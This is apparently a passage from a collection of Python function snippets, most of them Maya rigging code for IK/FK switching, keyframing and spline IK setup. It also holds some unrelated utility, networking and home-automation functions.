key_ik_fk(*args):\n if not pm.window(\"mimic_win\", exists=True):\n return\n\n current_tab = pm.tabLayout('switcher_tab_layout',\n query=True,\n selectTabIndex=True)\n\n try:\n if current_tab == 1:\n key_ik()\n elif current_tab == 2:\n key_fk()\n except:\n pm.warning('Error keying IK/FK')", "def get_Amn_one_k(self, ik):\n raise NotImplementedError(\n \"The get_Amn_one_k method is should be overrided.\")", "def key_fk(*args):\n\n robots = get_robot_roots()\n if not robots:\n pm.warning('No robots selected')\n return\n\n for robot in robots:\n # If the robot's IK attribute is on, switch the robot to\n # FK mode before proceeding\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n if pm.getAttr(target_ctrl_path + '.ik'):\n switch_to_fk(robot)\n\n # We first check if the target/tool controller transformation and\n # orientation is already aligned with the FK chain. If so, it\n # indicates that we're performing an IK to FK switch, and we\n # keyframe its position and orientation directly, without\n # snapping the IK control to the FK hierarchy. This is to avoid\n # unneccessarily changing the controllers Euler Angle rotation\n # representation that can cause unpredictable behavior between frames\n\n if pm.objExists(tool_ctrl_path):\n ctrl_ik = tool_ctrl_path\n ctrl_fk = format_path(__TOOL_CTRL_FK_PATH, robot)\n\n # If robot doesn't have a tool controller, use target_CTRL.\n else:\n ctrl_ik = target_ctrl_path\n ctrl_fk = format_path(__TCP_HDL_PATH, robot)\n\n if not _ik_and_fk_aligned(ctrl_ik, ctrl_fk):\n _snap_ik_target_to_fk(robot)\n\n # Key all FK elements\n try:\n pm.setKeyframe(format_path(__A1_FK_CTRL_PATH, robot),\n attribute='rotateY')\n pm.setKeyframe(format_path(__A2_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A3_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A4_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n pm.setKeyframe(format_path(__A5_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A6_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n\n # Key visibility of FK controllers\n for i in range(6):\n pm.setKeyframe(format_path(__FK_CTRLS_PATH, robot),\n attribute='visibility')\n except:\n pm.warning('Error setting FK keys in FK mode')\n\n # Key all IK elements\n try:\n pm.setKeyframe(target_ctrl_path, attribute='ik')\n pm.setKeyframe(target_ctrl_path, attribute='v', value=0)\n\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='v')\n\n # Key tool controllers\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='translate')\n pm.setKeyframe(tool_ctrl_path, attribute='rotate')\n else:\n pm.setKeyframe(target_ctrl_path, attribute='translate')\n pm.setKeyframe(target_ctrl_path, attribute='rotate')\n\n except:\n pm.warning('Error setting IK keys in FK mode')", "def _ik_and_fk_aligned(ik_ctrl, tcp_handle):\n\n # Define some small number to threshold our output\n delta = .0001\n\n # Initialize variables\n # translation_is_aligned = False\n # rotation_is_aligned = False\n ik_fk_are_aligned = False\n\n # Find the translation of each object and compare them\n ik_trans = pm.xform(ik_ctrl, q=True, rp=True, ws=True)\n tcp_trans = pm.xform(tcp_handle, q=True, rp=True, ws=True)\n\n # Find the distance between the ik controller and the tcp handle\n trans_diff = math.sqrt((ik_trans[0] - tcp_trans[0]) ** 2\n + (ik_trans[1] - tcp_trans[1]) ** 2\n + (ik_trans[2] - tcp_trans[2]) ** 2)\n\n if round(trans_diff, 6) < delta:\n ik_fk_are_aligned = True\n\n return ik_fk_are_aligned", "def make_knode(self,i,path_len=0):\n return Knode(path_len=path_len,\\\n ident=self.nodes[i].ident,\\\n lindex=i)", "def __setattr__(self, k, v):\n if k[:1] != '_' and \\\n not k in ('dimensions', 'typecode'):\n if k not in self._ncattrs:\n self._ncattrs += (k, )\n object.__setattr__(self, k, v)", "def setKi(self, integral_gain):\n self.__Ki = integral_gain", "def _establish_netmiko_handler(self, opt, net_connect_dict):\n\n key = opt['ip']\n try:\n net_connect = ConnectHandler(**opt)\n except NetMikoTimeoutException as error:\n reason = error.message\n raise ValueError('[Netmiko Timeout Exception:] %s' % reason)\n except NetMikoAuthenticationException as error:\n reason = error.message\n raise ValueError('[Netmiko Authentication Exception:] %s' % reason)\n except SSHException as error:\n reason = error.message\n raise ValueError('[SSH Exception:] %s' % reason)\n except Exception as error:\n reason = error.message\n raise ValueError('Failed to connect to switch %s' % reason)\n return net_connect", "def _add_control_channel(self, attrs):\n _cable_data = {}\n _cable_data[\"crate\"] = self._crate\n _cable_data[\"module\"] = self._module\n _cable_data[\"channel\"] = int(attrs.get('number', \"\"))\n _cable_data[\"name\"] = str(attrs.get('name', \"\"))\n self._data.append(_cable_data)", "def _snap_ik_target_to_fk(robot):\n\n # Snap IK Ctrl to FK location\n # If robot has tool controller, use that\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n tool_ctrl_fk_path = get_tool_ctrl_fk_path(robot)\n tcp_hdl_path = format_path(__TCP_HDL_PATH, robot)\n\n if pm.objExists(tool_ctrl_path):\n ctrl_ik = tool_ctrl_path\n ctrl_fk = tool_ctrl_fk_path\n\n # If robot doesn't have a tool controller, use target_CTRL.\n else:\n ctrl_ik = target_ctrl_path\n ctrl_fk = tcp_hdl_path\n\n # Snap tool_CTRL to tool_CTRL_FK.\n try:\n pm.snapTransforms(s=ctrl_fk, d=ctrl_ik)\n except:\n pm.warning('Coundn\\'t snap {} tool_CTRL handle to FK' \\\n .format(robot))", "def ikFkMatch(\n namespace,\n ikfk_attr,\n ui_host,\n fks,\n ik,\n upv,\n ik_rot=None,\n key=None):\n\n # returns a pymel node on the given name\n def _get_node(name):\n # type: (Text) -> pm.nodetypes.Transform\n name = anim_utils.stripNamespace(name)\n if namespace:\n node = anim_utils.getNode(\":\".join([namespace, name]))\n else:\n node = anim_utils.getNode(name)\n\n if not node:\n mgear.log(\"Can't find object : {0}\".format(name), mgear.sev_error)\n\n return node\n\n # returns matching node\n def _get_mth(name):\n # type: (str) -> pm.nodetypes.Transform\n tmp = name.split(\"_\")\n tmp[-1] = \"mth\"\n query = \"_\".join(tmp)\n n = _get_node(query)\n\n if not n:\n mgear.log(\"Can't find mth object : {0} for {1}\".format(query, name), mgear.sev_comment)\n return _get_node(name)\n else:\n return n\n\n # get things ready\n fk_ctrls = [_get_node(x) for x in fks]\n fk_goals = [_get_mth(x) for x in fks]\n ik_ctrl = _get_node(ik)\n ik_goal = _get_mth(ik)\n upv_ctrl = _get_node(upv)\n\n if ik_rot:\n ik_rot_node = _get_node(ik_rot)\n ik_rot_goal = _get_mth(ik_rot)\n\n ui_node = _get_node(ui_host)\n o_attr = ui_node.attr(ikfk_attr)\n\n switch_to_fk = (o_attr.get() == 1.0)\n switch_to_ik = (not switch_to_fk)\n\n # sets keyframes before snapping\n if key:\n _all_controls = []\n _all_controls.extend(fk_ctrls)\n _all_controls.extend([ik_ctrl, upv_ctrl, ui_node])\n if ik_rot:\n _all_controls.extend([ik_rot_node])\n [cmds.setKeyframe(\"{}\".format(elem),\n time=(cmds.currentTime(query=True) - 1.0))\n for elem in _all_controls]\n\n # if is IKw then snap FK\n if switch_to_fk:\n\n world_matrices = []\n for src, _ in zip(fk_goals, fk_ctrls):\n world_matrices.append(getMatrix(src))\n\n o_attr.set(0.0)\n\n for mat, dst in zip(world_matrices, fk_ctrls):\n setMatrix(dst, mat)\n\n for mat, dst in zip(world_matrices, fk_ctrls):\n setMatrix(dst, mat)\n\n # if is FKw then sanp IK\n elif switch_to_ik:\n\n shoulder_mat = getMatrix(fk_goals[0])\n ik_mat = getMatrix(ik_goal)\n\n # transform.matchWorldTransform(ik_goal, ik_ctrl)\n if ik_rot:\n rot_mat = getMatrix(ik_rot_goal)\n # transform.matchWorldTransform(ik_rot_goal, ik_rot_node)\n\n upv_mat = getMatrix(fk_goals[2])\n\n o_attr.set(1.0)\n\n setMatrix(ik_ctrl, ik_mat)\n setMatrix(upv_ctrl, upv_mat)\n # for _ in range(10):\n # fk_ctrls[0].setMatrix(shoulder_mat, worldSpace=True)\n\n for _ in range(20):\n cmds.xform(fk_ctrls[0].name(), ws=True, matrix=shoulder_mat)\n if ik_rot:\n setMatrix(ik_rot_node, rot_mat)\n\n # transform.matchWorldTransform(fk_goals[1], upv_ctrl)\n # calculates new pole vector position\n start_end = (fk_goals[-1].getTranslation(space=\"world\") - fk_goals[1].getTranslation(space=\"world\"))\n start_mid = (fk_goals[2].getTranslation(space=\"world\") - fk_goals[1].getTranslation(space=\"world\"))\n\n dot_p = start_mid * start_end\n proj = float(dot_p) / float(start_end.length())\n proj_vector = start_end.normal() * proj\n arrow_vector = (start_mid - proj_vector) * 1.5\n arrow_vector *= start_end.normal().length()\n final_vector = (arrow_vector + fk_goals[2].getTranslation(space=\"world\"))\n upv_ctrl.setTranslation(final_vector, space=\"world\")\n\n # sets blend attribute new value\n # o_attr.set(1.0)\n roll_att = ui_node.attr(ikfk_attr.replace(\"blend\", \"roll\"))\n roll_att.set(0.0)\n\n setMatrix(ik_ctrl, ik_mat)\n if ik_rot:\n setMatrix(ik_rot_node, rot_mat)\n # upv_ctrl.setMatrix(upv_mat, worldSpace=True)\n for _ in range(20):\n cmds.xform(fk_ctrls[0].name(), ws=True, matrix=shoulder_mat)\n\n # sets keyframes\n if key:\n [cmds.setKeyframe(\"{}\".format(elem),\n time=(cmds.currentTime(query=True)))\n for elem in _all_controls]", "def setKi(self, integral_gain):\n self.Ki = integral_gain", "def setKi(self, integral_gain):\n\t\tself.Ki = integral_gain", "def make_control_knowledge_variables(self, horizon):\n # You might want to save your variables here, or feel free to make as\n # many data structures as you need to keep track of them.\n\n self.control_fluent_codes = {}\n\n \"\"\" *** YOUR CODE HERE *** \"\"\"\n\n # DID NOT DEFINE ANY EXTRA VARIABLES, ALL DONE IN THE METHOD BELOW", "def fk_to_ik(node):\n # Get relevant data\n ik_pole_off = get_parent(node.ik_pole_conn)\n\n world_trans_ik_pole_off = get_world_trans(ik_pole_off)\n world_trans_fk_01 = get_world_trans(node.fk_01_conn)\n world_trans_fk_02 = get_world_trans(node.fk_02_conn)\n world_trans_fk_03 = get_world_trans(node.fk_03_conn)\n world_trans_ik_pole = get_world_trans(node.ik_pole_conn)\n\n world_rot_fk_03 = get_world_rot(node.fk_03_conn)\n\n # calculate ik pole position\n ik_pole_mid_point = (world_trans_fk_01 + world_trans_fk_03) / 2\n ik_pole_base = world_trans_fk_02 - ik_pole_mid_point\n\n # Handle the case when the leg is fully stretched\n if ik_pole_base.length() <= 0.0001:\n rot_fk_01 = get_rot_as_quat(node.fk_01_conn)\n rot_fk_02 = get_rot_as_quat(node.fk_02_conn)\n\n rot = rot_fk_01 * rot_fk_02\n\n ik_pole_base = oMa.MVector(2 * (rot.x * rot.z + rot.w * rot.y),\n 2 * (rot.y * rot.z - rot.w * rot.x),\n 1 - 2 * (rot.x * rot.x + rot.y * rot.y))\n\n ik_pole_len = (world_trans_ik_pole - world_trans_fk_02).length()\n\n pos_ik_pole = world_trans_fk_02 + ik_pole_base.normalize() * ik_pole_len - world_trans_ik_pole_off\n\n # Get the destination MPlugs\n ik_main_trans_plugs = get_trans_plugs(node.ik_main_conn)\n ik_main_rot_plugs = get_rot_plugs(node.ik_main_conn)\n ik_pole_trans_plugs = get_trans_plugs(node.ik_pole_conn)\n\n # Set the new values\n for i, plug in enumerate(ik_main_trans_plugs):\n plug.setFloat(world_trans_fk_03[i])\n\n for i, plug in enumerate(ik_main_rot_plugs):\n plug.setMAngle(oMa.MAngle(world_rot_fk_03[i], oMa.MAngle.kRadians))\n\n for i, plug in enumerate(ik_pole_trans_plugs):\n plug.setFloat(pos_ik_pole[i])", "def attach_tool_controller(*args):\n\n sel = pm.ls(selection=True, type='transform')\n robot = get_robot_roots()\n\n # Exception handling\n if not sel:\n pm.warning('Nothing selected; ' \\\n 'select a valid robot control and tool controller')\n return\n if not robot:\n pm.warning('No robot selected; ' \\\n 'select a valid robot')\n return\n if len(robot) > 1:\n pm.warning('Too many robots selected; ' \\\n 'select a single robot')\n return\n if len(sel) > 2:\n pm.warning('Too many selections; ' \\\n 'select a single robot control, and single tool controller')\n return\n if len(sel) == 1:\n pm.warning('Not enough selections; ' \\\n 'select a single robot control, and single tool control')\n return\n if pm.objExists(get_tool_ctrl_path(robot[0])):\n pm.warning('Robot already has an assigned tool controller')\n return\n\n robot = robot[0] \n\n ns = robot.namespace()\n robot_grp_path = format_path(__ROBOT_GRP_PATH, robot)\n\n # find which selected object is the tool controller\n if not get_robot_roots(0, [sel[0]]):\n tool_ctrl = sel[0]\n else:\n tool_ctrl = sel[1]\n \n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n tool_ctrl_fk_path = get_tool_ctrl_fk_path(robot)\n\n try:\n pm.parent(tool_ctrl, robot_grp_path, absolute=True)\n pm.rename(robot_grp_path + '|' + tool_ctrl, '{}tool_CTRL'.format(ns))\n \n pm.parentConstraint(tool_ctrl_path,\n target_ctrl_path,\n name='targetToToolCtrl_pCnst',\n maintainOffset=True)\n\n # Duplicate and add to FK parent chain\n tool_ctrl_dup = pm.duplicate(tool_ctrl_path)\n pm.rename(tool_ctrl_dup, '{}tool_CTRL_FK'.format(ns))\n pm.parent('{0}|{1}robot_GRP|{1}tool_CTRL_FK'.format(robot, ns),\n format_path(__TCP_HDL_PATH, robot),\n absolute=True)\n pm.setAttr(tool_ctrl_fk_path + '.v', 0)\n\n # Lock rotation/translation of IK/FK CTRL (only works if prefs | file\n # references | edits on references is checked)\n\n try:\n \n pm.setAttr(target_ctrl_path + '.translate', lock=True)\n pm.setAttr(target_ctrl_path + '.rotate', lock=True)\n\n pm.setAttr(tool_ctrl_fk_path + '.translate', lock=True)\n pm.setAttr(tool_ctrl_fk_path + '.rotate', lock=True)\n\n except:\n pass\n\n pm.select(tool_ctrl_path)\n pm.headsUpMessage('Tool Controller attatched successfuly!')\n except:\n pm.warning('Error attaching tool controller')", "def __init__(\n self,\n netatmo_device: NetatmoDevice,\n ) -> None:\n super().__init__(netatmo_device.data_handler)\n\n self._switch = cast(NaModules.Switch, netatmo_device.device)\n\n self._id = self._switch.entity_id\n self._attr_name = self._device_name = self._switch.name\n self._model = self._switch.device_type\n self._config_url = CONF_URL_CONTROL\n\n self._home_id = self._switch.home.entity_id\n\n self._signal_name = f\"{HOME}-{self._home_id}\"\n self._publishers.extend(\n [\n {\n \"name\": HOME,\n \"home_id\": self._home_id,\n SIGNAL_NAME: self._signal_name,\n },\n ]\n )\n self._attr_unique_id = f\"{self._id}-{self._model}\"\n self._attr_is_on = self._switch.on", "def setKi(self, integral_gain):\r\n self.Ki = integral_gain", "def generate_control_mappings(self, control):\n acr_creator = all_models.AccessControlRole.query.filter_by(\n name=\"Creators\", object_type=\"Assessment\"\n ).first()\n with factories.single_commit():\n person = factories.PersonFactory()\n asmnt_ids = []\n for _ in range(2):\n asmnt = factories.AssessmentFactory()\n asmnt_ids.append(asmnt.id)\n factories.AccessControlListFactory(\n object=asmnt, person=person, ac_role=acr_creator\n )\n\n for asmnt_id in asmnt_ids:\n asmnt = all_models.Assessment.query.get(asmnt_id)\n self.gen.generate_relationship(source=asmnt, destination=control)", "def _CreateNewNic(self, idx, params, private):\n mac = params[constants.INIC_MAC]\n ip = params.get(constants.INIC_IP, None)\n net = params.get(constants.INIC_NETWORK, None)\n name = params.get(constants.INIC_NAME, None)\n net_uuid = self.cfg.LookupNetwork(net)\n #TODO: not private.filled?? can a nic have no nicparams??\n nicparams = private.filled\n nobj = objects.NIC(mac=mac, ip=ip, network=net_uuid, name=name,\n nicparams=nicparams)\n nobj.uuid = self.cfg.GenerateUniqueID(self.proc.GetECId())\n\n changes = [\n (\"nic.%d\" % idx,\n \"add:mac=%s,ip=%s,mode=%s,link=%s,network=%s\" %\n (mac, ip, private.filled[constants.NIC_MODE],\n private.filled[constants.NIC_LINK], net)),\n ]\n\n if self.op.hotplug:\n msg = self._HotplugDevice(constants.HOTPLUG_ACTION_ADD,\n constants.HOTPLUG_TARGET_NIC,\n nobj, None, idx)\n changes.append((\"nic.%d\" % idx, msg))\n\n return (nobj, changes)", "def add_item(controller_widget, control_name, control_instance):\n # Get a new key name\n trait_name = 'new_item'\n i = 1\n while control_instance.controller.trait(trait_name):\n trait_name = 'new_item_%d' % i\n i += 1\n\n # Add the new trait to the inner list controller\n control_instance.controller.add_trait(\n trait_name, control_instance.inner_trait)\n\n # update interface\n control_instance.controller_widget.update_controls()\n # update the real underlying dict object\n control_instance.controller_widget.update_controller()\n\n logger.debug(\"Add 'ControllerControlWidget' '{0}' new trait \"\n \"callback.\".format(trait_name))", "def __init__(self, attck_obj = None, **kwargs):\n\n super(AttckTools, self).__init__(**kwargs)\n self.attck_obj = attck_obj\n\n self.id = self._set_id(kwargs)\n self.name = self._set_attribute(kwargs, 'name')\n self.alias = self._set_attribute(kwargs, 'aliases')\n self.description = self._set_attribute(kwargs, 'description')\n self.reference = self._set_reference(kwargs)\n self.created = self._set_attribute(kwargs, 'created')\n self.modified = self._set_attribute(kwargs, 'modified')\n self.stix = self._set_attribute(kwargs, 'id')\n self.type = self._set_attribute(kwargs, 'type')\n self.wiki = self._set_wiki(kwargs)\n self.contributor = self._set_attribute(kwargs, 'contributor')\n\n self.set_relationships(self.attck_obj)\n\n if AttckTools.__ATTCK_C2_DATASETS is None or AttckTools.__ATTCK_TOOLS_DATASETS is None:\n try:\n data = AttckDatasets().generated_attck_data()\n except:\n raise GeneratedDatasetException('Unable to retrieve generated attack data properties')\n if AttckTools.__ATTCK_C2_DATASETS is None:\n if 'c2_data' in data:\n AttckTools.__ATTCK_C2_DATASETS = data['c2_data']\n if AttckTools.__ATTCK_TOOLS_DATASETS is None:\n if 'tools' in data:\n AttckTools.__ATTCK_TOOLS_DATASETS = data['tools']\n\n self.c2_data = self.__get_c2_dataset()\n self.external_dataset = self.__get_tools_dataset()", "def learn_ICA(X, k):\n\n # TODO: YOUR CODE HERE", "def __setattr__(self, x, kid):\r\n if isinstance(kid, Morphology):\r\n if kid is None:\r\n del self[x]\r\n else:\r\n self[x] = kid\r\n else: # If it is not a subtree, then it's a normal class attribute\r\n object.__setattr__(self, x, kid)", "def __init__(self, env, action_repeat=1):\n super().__init__(env)\n if self.env.mujoco_robot.name == \"sawyer\":\n from robosuite.controllers import SawyerIKController\n\n self.controller = SawyerIKController(\n bullet_data_path=os.path.join(robosuite.models.assets_root, \"bullet_data\"),\n robot_jpos_getter=self._robot_jpos_getter,\n )\n elif self.env.mujoco_robot.name == \"baxter\":\n from robosuite.controllers import BaxterIKController\n\n self.controller = BaxterIKController(\n bullet_data_path=os.path.join(robosuite.models.assets_root, \"bullet_data\"),\n robot_jpos_getter=self._robot_jpos_getter,\n )\n else:\n raise Exception(\n \"Only Sawyer and Baxter robot environments are supported for IK \"\n \"control currently.\"\n )\n\n self.action_repeat = action_repeat", "def set_node_attributes(G, attr_name):\n if attr_name == 'k-index':\n core_number = nx.core_number(G)\n nx.set_node_attributes(G, core_number, name=attr_name)\n else:\n print('Unknown attribute name:', attr_name)", "def __init__(\n self, upv_object, protect_data, server_info, camera_id, switch, ir_on, ir_off\n ):\n super().__init__(upv_object, protect_data, server_info, camera_id, switch)\n self.upv = upv_object\n switch_type = SWITCH_TYPES[switch]\n self._name = f\"{switch_type[_SWITCH_NAME]} {self._camera_data['name']}\"\n self._icon = f\"mdi:{switch_type[_SWITCH_ICON]}\"\n self._ir_on_cmd = ir_on\n self._ir_off_cmd = ir_off\n self._switch_type = switch_type[_SWITCH_TYPE]", "def __init__(\n self,\n switch_type: str,\n switch_name: str,\n tm_client: TransmissionClient,\n client_name: str,\n ) -> None:\n self._attr_name = switch_name\n self.type = switch_type\n self._tm_client = tm_client\n self._state = STATE_OFF\n self._data = None\n self.unsub_update: Callable[[], None] | None = None\n self._attr_unique_id = f\"{tm_client.config_entry.entry_id}-{switch_type}\"\n self._attr_device_info = DeviceInfo(\n entry_type=DeviceEntryType.SERVICE,\n identifiers={(DOMAIN, tm_client.config_entry.entry_id)},\n manufacturer=\"Transmission\",\n name=client_name,\n )", "def _make_acquisition_controllers(self, auto_init=True):\n for instance_name, _ in self.config_data[\"controllers\"].items():\n self._acquisition_controllers[\n instance_name\n ] = RemoteAcquisitionControl(\n instance_name=instance_name,\n config_data=self.config_data,\n control_socket_wrapper=self._control_socket,\n auto_init=auto_init,\n )", "def createLayeredSplineIK(jnts, name, rig=None, side='C', extraName='', parent=None, dyn=False):\n moduleName = utils.setupBodyPartName(extraName, side)\n col = utils.getColors(side)\n ## create base layer jnts\n tmpCrv = utils.createCrvFromObjs(jnts, crvName='tmpCrv')\n ctrlGrp = utils.newNode('group', name='{}{}Ctrls'.format(extraName, name), side=side,\n parent=rig.ctrlsGrp.name if rig else None, skipNum=True)\n mechGrp = utils.newNode('group', name='{}{}Mech'.format(extraName, name), side=side,\n parent=rig.mechGrp.name if rig else None, skipNum=True)\n baseJnts = utils.createJntsFromCrv(tmpCrv, numOfJnts=4, side=side,\n name='{}{}_baseLayer'.format(extraName, name))\n if rig:\n cmds.parent(jnts[0], rig.skelGrp.name)\n cmds.parent(baseJnts[0], mechGrp.name)\n ## parent locs to base jnts\n ## base layer ctrls\n baseLayerLocs = []\n baseLayerCtrls = []\n baseCtrlParent = ctrlGrp.name\n for each in baseJnts:\n baseLoc = utils.newNode('locator', name='{}{}_baseLayer'.format(extraName, name),\n side=side)\n baseLoc.parent(each, relative=True)\n utils.setShapeColor(baseLoc.name, color=None)\n baseLayerLocs.append(baseLoc)\n baseCtrl = ctrlFn.ctrl(name='{}{}_baseLayer'.format(extraName, name), guide=each,\n side=side, parent=baseCtrlParent, rig=rig,\n scaleOffset=rig.scaleOffset)\n baseCtrl.constrain(each)\n baseCtrl.modifyShape(shape='cube', color=col['col2'], scale=(1, 1, 1))\n baseLayerCtrls.append(baseCtrl)\n baseCtrlParent = baseCtrl.ctrlEnd\n baseSpaces = [rig.globalCtrl.ctrlEnd]\n if parent:\n baseSpaces.insert(0, parent)\n baseLayerCtrls[0].spaceSwitching(parents=baseSpaces, niceNames=None,\n constraint='parent', dv=0)\n\n ## mid layer crv FROM BASE JNTS\n midCrv = utils.createCrvFromObjs(baseJnts, crvName='{}_midLayer'.format(name),\n side=side, extraName=extraName)\n ## create mid jnts\n midJnts = utils.createJntsFromCrv(tmpCrv, numOfJnts=7, side=side,\n name='{}{}_midLayer'.format(extraName, name))\n cmds.parent(midJnts[0], mechGrp.name)\n cmds.delete(tmpCrv)\n ## parent locs to mid jnts\n ## create mid ctrls - parent constrain root grp to mid jnts\n midLayerLocs = []\n midLayerCtrls = []\n midCtrlParent = ctrlGrp.name\n for each in midJnts:\n midCtrl = ctrlFn.ctrl(name='{}{}_midLayer'.format(extraName, name), guide=each,\n side=side, parent=midCtrlParent, rig=rig,\n scaleOffset=rig.scaleOffset)\n cmds.parentConstraint(each, midCtrl.rootGrp.name, mo=1)\n midCtrl.modifyShape(shape='sphere', color=col['col1'], scale=(0.4, 0.4, 0.4))\n midLayerCtrls.append(midCtrl)\n midLoc = utils.newNode('locator', name='{}{}_midLayer'.format(extraName, name),\n side=side)\n utils.setShapeColor(midLoc.name, color=None)\n midLoc.parent(midCtrl.ctrlEnd, relative=True)\n midLayerLocs.append(midLoc)\n midCtrlParent = midCtrl.ctrlEnd\n ## ik spline mid crv to mid jnts\n midIKSpline = ikFn.ik(sj=midJnts[0], ej=midJnts[-1],\n name='{}{}_midLayerIK'.format(extraName, name), side=side)\n midIKSpline.createSplineIK(crv=midCrv, parent=mechGrp.name)\n midIKSpline.addStretch(operation='both', mode='length',\n globalScaleAttr=rig.scaleAttr if rig else None)\n midIKSpline.advancedTwist(baseLayerCtrls[0].ctrlEnd, endObj=baseLayerCtrls[-1].ctrlEnd,\n wuType=4)\n ## connect mid crv cvs to base locators\n for i, each in enumerate(baseLayerLocs):\n cmds.connectAttr('{}.wp'.format(each.name), '{}Shape.cv[{}]'.format(midCrv, i))\n ## create skin crv FROM MID JNTS\n skinCrvIn = utils.createCrvFromObjs(midJnts, side=side, extraName=extraName,\n crvName='{}_skinLayer{}'.format(name,\n 'DynIn' if dyn else ''))\n skinCrvInShape = cmds.listRelatives(skinCrvIn, s=1)[0]\n if dyn:\n dynMechGrp = utils.newNode('group', name='{}Dynamics'.format(name), side=side,\n parent=mechGrp.name, skipNum=True)\n cmds.parent(skinCrvIn, dynMechGrp.name)\n skinCrv = utils.createCrvFromObjs(midJnts, crvName='{}_skinLayer'.format(name),\n side=side, extraName=extraName)\n ## create output curve\n dynOutCrv = utils.createCrvFromObjs(midJnts, side=side, extraName=extraName,\n crvName='{}_skinLayerDynOut'.format(name))\n cmds.parent(dynOutCrv, dynMechGrp.name)\n dynOutCrvShape = cmds.listRelatives(dynOutCrv, s=1)[0]\n ## create follicle\n fol = utils.newNode('follicle', name='{}_skinLayerDyn'.format(name), side=side,\n parent=dynMechGrp.name)\n cmds.setAttr('{}.restPose'.format(fol.name), 1)\n cmds.setAttr('{}.startDirection'.format(fol.name), 1)\n cmds.setAttr('{}.degree'.format(fol.name), 3)\n ## create hair system\n hs = utils.newNode('hairSystem', name='{}_skinLayerDyn'.format(name), side=side,\n parent=dynMechGrp.name)\n ## create nucleus\n nuc = utils.newNode('nucleus', name='{}_skinLayerDyn'.format(name), side=side,\n parent=dynMechGrp.name)\n ## connect shit\n fol.connect('startPosition', '{}.local'.format(skinCrvInShape), mode='to')\n fol.connect('startPositionMatrix', '{}.wm'.format(skinCrvIn), mode='to')\n fol.connect('currentPosition', '{}.outputHair[0]'.format(hs.name), mode='to')\n fol.connect('outCurve', '{}.create'.format(dynOutCrvShape), mode='from')\n fol.connect('outHair', '{}.inputHair[0]'.format(hs.name), mode='from')\n hs.connect('currentState', '{}.inputActive[0]'.format(nuc.name), mode='from')\n hs.connect('startState', '{}.inputActiveStart[0]'.format(nuc.name), mode='from')\n hs.connect('nextState', '{}.outputObjects[0]'.format(nuc.name), mode='to')\n hs.connect('startFrame', '{}.startFrame'.format(nuc.name), mode='to')\n hs.connect('currentTime', 'time1.outTime', mode='to')\n nuc.connect('currentTime', 'time1.outTime', mode='to')\n ## blend shape curves\n blendNode = cmds.blendShape(skinCrvIn, dynOutCrv, skinCrv,\n n='{}_{}Dynamics{}'.format(side, name, suffix['blend']))[0]\n ## connect blend shape to attribute\n ##- create dyn control\n dynCtrl = ctrlFn.ctrl(name='{}Settings'.format(name),\n guide='{}_{}SettingsGuide{}'.format(side, name, suffix['locator']),\n rig=rig, deleteGuide=True, side=side, skipNum=True,\n parent=rig.settingCtrlsGrp.name)\n dynCtrl.makeSettingCtrl(ikfk=False, parent=jnts[0])\n dynCtrl.addAttr('dynSwitch', nn='Dynamics Switch', minVal=0, maxVal=1, defaultVal=1)\n dynSwitchRev = utils.newNode('reverse', name='{}DynamicsSwitch'.format(name), side=side)\n cmds.connectAttr(dynCtrl.ctrl.dynSwitch, '{}.{}'.format(blendNode, dynOutCrv))\n dynSwitchRev.connect('inputX', dynCtrl.ctrl.dynSwitch, mode='to')\n dynSwitchRev.connect('outputX', '{}.{}'.format(blendNode, skinCrvIn), mode='from')\n\n else:\n skinCrv = skinCrvIn\n\n\n ## ik spline skin crv to skin jnts\n skinIKSpline = ikFn.ik(sj=jnts[0], ej=jnts[-1],\n name='{}{}_skinLayerIK'.format(extraName, name), side=side)\n skinIKSpline.createSplineIK(crv=skinCrv, parent=mechGrp.name)\n skinIKSpline.addStretch(operation='both', mode='length',\n globalScaleAttr=rig.scaleAttr if rig else None)\n skinIKSpline.advancedTwist(midLayerCtrls[0].ctrlEnd, endObj=midLayerCtrls[-1].ctrlEnd,\n wuType=4)\n ## connect skin crv cvs to mid locators\n for i, each in enumerate(midLayerLocs):\n cmds.connectAttr('{}.wp'.format(each.name), '{}Shape.cv[{}]'.format(skinCrvIn, i))\n\n ##", "def biped_stretch(ik_ctrl,\n ik_last_node,\n pv_ctrl,\n switch_ctrl,\n up_arm_fk_ctrl,\n lo_arm_fk_ctrl,\n wrist_fk_ctrl,\n up_arm_ik_jnt,\n lo_arm_ik_jnt,\n wrist_ik_jnt,\n ik_handle,\n pin_attr_name='pinElbow',\n shift_attr_name='shiftElbow'):\n\n # add all my attrs on ctrls\n mc.addAttr(ik_ctrl, ln=pin_attr_name, at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln=shift_attr_name, at='double', min=-1, max=1, k=1)\n\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln='upStretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(ik_ctrl, ln='loStretch', at='double', dv=1, min=0.001, k=1)\n\n mc.addAttr(up_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(lo_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n lo_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')\n wrist_init_length = mc.getAttr(wrist_ik_jnt+'.tx')\n max_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')+mc.getAttr(wrist_ik_jnt+'.tx')\n\n lo_abs_init_length = abs(mc.getAttr(lo_arm_ik_jnt+'.tx'))\n wrist_abs_length = abs(mc.getAttr(wrist_ik_jnt+'.tx'))\n\n # Get parents for ik handle and root of the parm\n arm_root_grp = utils.get_parent(up_arm_ik_jnt)\n\n # Create distance nodes between base, end, and pv ctrl to get the length of side of the triangle\n 